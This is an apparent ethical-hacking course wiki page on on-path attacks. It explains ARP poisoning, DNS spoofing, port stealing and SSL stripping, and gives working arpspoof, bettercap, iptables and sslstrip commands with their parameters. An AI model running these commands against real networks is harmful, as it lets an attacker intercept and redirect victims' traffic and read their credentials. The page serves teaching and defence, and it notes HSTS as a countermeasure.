Class 3 ‐ On‐Path Attacks - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

On-Path

What are On-Path Attacks?

  • Man-in-the-Middle attacks are based on eavesdropping on communication.
  • Used to obtain information secretly.
  • Allows control over network traffic.

On-Path Positioning

  • Wireless networks automatically allow On-Path positions with various attack vectors.
  • LANs require physical connections to view network traffic.

Execution Steps

  1. An attacking machine places itself between computers communicating with each other.
  2. Victims have no idea their communication is being intercepted.
  3. Potentially sensitive information about a client is collected as the communication continues.

ARP Poisoning

Address Resolution Protocol

  • ARP resolves IP addresses to MAC addresses.
  • Layer 2 protocol in LANs.
  • Used in broadcast communication.
  • Resolves information saved in ARP tables.

ARP Table

ARP Table

  • The command arp –a is used in Windows machines to display the ARP table.

ARP Poisoning Process

  • Exploits lack of ARP packet validation.
  • Forges ARP request packets.
  • Requests are sent as if by the victim.
  • Updates ARP tables in the network’s nodes.

Arpspoof

Arpspoof

  • Arpspoof is a tool used to execute an ARP poisoning attack.
  • A forged packet is sent numerous times on the network.
  • The victim’s ARP table is updated with the false entry.

Enable Forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward
  1. echo outputs a text value passed as an argument.
  2. 1 is the value.
  3. ‘>’ passes the value to the path.
  4. /proc/sys/net/ipv4/ip_forward is the file location.
  • The command tells the computer to forward packets to the specified destination.

Arpspoof Command

Arpspoof –i [interface] –t [victim IP] [target IP] -r

Arpspoof Command

  • Arpspoof command parameters:
    • -i [interface] – specifies the NIC
    • -t [victim IP] – IP of the poisoned computer
    • [target IP] – impersonated IP
    • -r – allows bidirectional data flow (optional)

DNS Poisoning

DNS Poisoning Process

  • Use ARP poisoning to position the machine in the middle.
  • Configure host file.
  • Capture victim’s DNS request.
  • Redirect the victim to a target IP.

Hosts File

Hosts File

  • Exists in every computer.
  • Contains records of domain names and IP addresses.
  • Used to resolve domain names to IP addresses.

Bettercap

Bettercap

  • A tool used for On-Path attacks.
  • Can initiate ARP poisoning and DNS spoofing.
  • Sends false DNS responses to the victim.

Bettercap ARP Poisoning

set arp.spoof.target [victim IP]
arp.spoof on

Bettercap ARP Poisoning

  • Bettercap ARP command parameters:
    • set – specifies the required parameters
    • arp.spoof.target – specifies the target IP
    • arp.spoof – specifies ARP spoofing actions

Bettercap DNS Poisoning

set dns.spoof.domains [domain]; Set dns.spoof.address [target IP]
dns.spoof on

Bettercap DNS Poisoning

  • Bettercap DNS command parameters:
    • set – specifies required parameters
    • dns.spoof.domains – specifies website domains to be spoofed
    • dns.spoof.address – specifies IP addresses for redirection

DNS Poisoning Result

DNS Poisoning Result

  • When victims try to browse to www.yahoo.com, they may end up elsewhere …

Port Stealing

What is Port Stealing?

  • Populating the forwarding table.
  • Uses victim’s MAC address.
  • Works only in LANs.
  • Can cause a delay or packet loss.

Port Stealing Process

Port Stealing Process

  • May be executed when ARP poisoning does not work.
  • Floods the switch with layer 2 packets.
  • Packets are destined for the attacker, and originate in the victim’s machine.

SSL Stripping

What is SSL Stripping?

  • Almost all websites use HTTPS.
  • Data is sent with TLS encryption.
  • SSL stripping downgrades HTTPS to HTTP.
  • Provides plain text view of the data.

SSL Stripping Process

SSL Stripping Process

  • The client contacts the web server with an HTTP request.
  • The server redirects the client to HTTPS and creates the session.
  • The attacker interrupts the redirection.

SSL Stripping Process

  • The attack should be executed using forwarding, while the attacker is the On-Path.
  • Port redirection should be used to redirect away from 80.
  • The sslstrip tool is used to strip the encryption.

iptables Command

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8080
  1. iptables - Enables Linux firewall capabilities
  2. -t nat - Manipulates the NAT table
  3. -A PREROUTING - Appends data to a pre-routing chain
  4. -p tcp - Protocol type
  5. --destination-port 80 - The accessed port
  6. -j REDIRECT - Action
  7. --to-port 8080 - Target port
  • The command redirects data from port 80 to port 8080.

sslstrip Command

sslstrip –l 8080
  • sslstrip - Activates the tool
  • -l 8080 - The port to listen to
  • The command activates the sslstrip tool to listen on port 8080.

SSL Strip Result

SSL Strip Result

  • Victim browses unsecurely after sslstrip is executed (website no longer has the lock icon).

SSL Strip Process

SSL Strip Process

  • The left panel in the example shows the result of a strip request.
  • The right panel shows a regular HTTPS request.
  • HSTS should be used to defend against SSL stripping.